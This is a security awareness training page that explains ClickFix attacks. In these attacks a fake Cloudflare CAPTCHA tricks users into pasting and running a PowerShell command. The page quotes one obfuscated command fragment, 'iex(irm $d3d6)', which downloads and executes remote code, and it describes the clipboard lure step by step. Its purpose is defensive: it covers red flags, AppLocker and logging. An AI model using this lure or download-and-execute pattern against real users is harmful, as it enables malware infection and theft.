ClickFix Attack Explainer | Security Awareness Training

femcaremedspa.com

1

Attack Stage

The Initial Lure

The victim visits a compromised or malicious website. They're presented with what appears to be a legitimate Cloudflare CAPTCHA verification page. Everything looks authentic—the Cloudflare branding, the "Verify you are human" checkbox, and the security messaging.

🎭 Social Engineering Tactic

Cloudflare protects millions of websites, so users are conditioned to trust these verification pages. Attackers exploit this familiarity to lower the victim's guard.

1

Legitimate appearance: Real Cloudflare logo, authentic styling, convincing Ray ID

2

Trust exploitation: Users encounter real Cloudflare checks daily, creating automatic compliance

femcaremedspa.com

2

Attack Stage

Malicious Instructions

After clicking the checkbox, a popup appears with "Verification Steps." This is where the attack diverges from legitimate Cloudflare behavior. The victim is instructed to press specific key combinations.

🚨 Critical Red Flag

Real Cloudflare NEVER asks you to:

• Press Windows + R (opens Run dialog)
• Press Ctrl + V (paste from clipboard)
• Press Enter to execute anything

These are commands designed to execute code, not verify you're human.

📋 What's Actually Happening

// When clicking the fake checkbox:
1. Malicious script copies PowerShell command to clipboard
2. Win+R opens Windows Run dialog
3. Ctrl+V pastes the malicious command
4. Enter executes the payload

femcaremedspa.com + Windows Run Dialog

3

Attack Stage

Payload Execution

The Windows Run dialog now contains the malicious PowerShell command that was silently copied to the clipboard. If the user presses Enter, the malware payload executes with their user privileges.

💀 Malicious Payload Detected

The command shown contains obfuscated PowerShell that will:

• Download malware from a remote server
• Execute it directly in memory (fileless)
• Potentially install info-stealers, ransomware, or RATs

⚠️ Obfuscated Command Analysis

// Visible in Run dialog:
[ToInt16($ha80.Substring($i,2),16)];iex(irm $d3d6)

// Decoded behavior:
iex = Invoke-Expression (execute code)
irm = Invoke-RestMethod (download)
$d3d6 = Attacker's malware URL

⚡

Complete Attack Chain

How ClickFix compromises systems in under 10 seconds

🌐

Visit Site

Compromised website

☑️

Click Checkbox

Copies payload to clipboard

⌨️

Follow Steps

Win+R, Ctrl+V, Enter

💀

Compromised

Malware executes

🎯

Why It Works

Exploits user trust in Cloudflare's ubiquitous security checks. Most users have clicked hundreds of real CAPTCHAs and don't question the process.

🔓

Bypasses Security

User manually executes the command, bypassing email filters, browser warnings, and many endpoint protections. It's user-initiated execution.

👻

Fileless Execution

PowerShell downloads and executes code directly in memory. No file is written to disk, evading traditional antivirus signature detection.

🎭

Common Payloads

Info-stealers (Lumma, RedLine), Remote Access Trojans (AsyncRAT), cryptocurrency miners, and ransomware droppers.

🛡️ DEFENSE STRATEGIES

Protecting Your Organization

Train employees to recognize and report these attacks before damage occurs.

✓

Cloudflare Never Asks for Keyboard Commands

Real CAPTCHA verification requires only mouse clicks. Any request for Win+R, Ctrl+V, or Enter is an attack.

✓

Check Your Clipboard

If a website asks you to paste something, open Notepad first and paste there to see what's actually on your clipboard.

✓

Restrict PowerShell Execution

Use AppLocker or Windows Defender Application Control to limit PowerShell to signed scripts only.

✓

Enable PowerShell Logging

Configure Script Block Logging and Module Logging to detect and investigate suspicious commands.

✓

Report Suspicious Pages

Train users to report unusual verification requests to IT security immediately. Early detection prevents spread.

Remember: When in doubt, don't click out.

Close the browser tab and navigate to the site directly if you need to access it.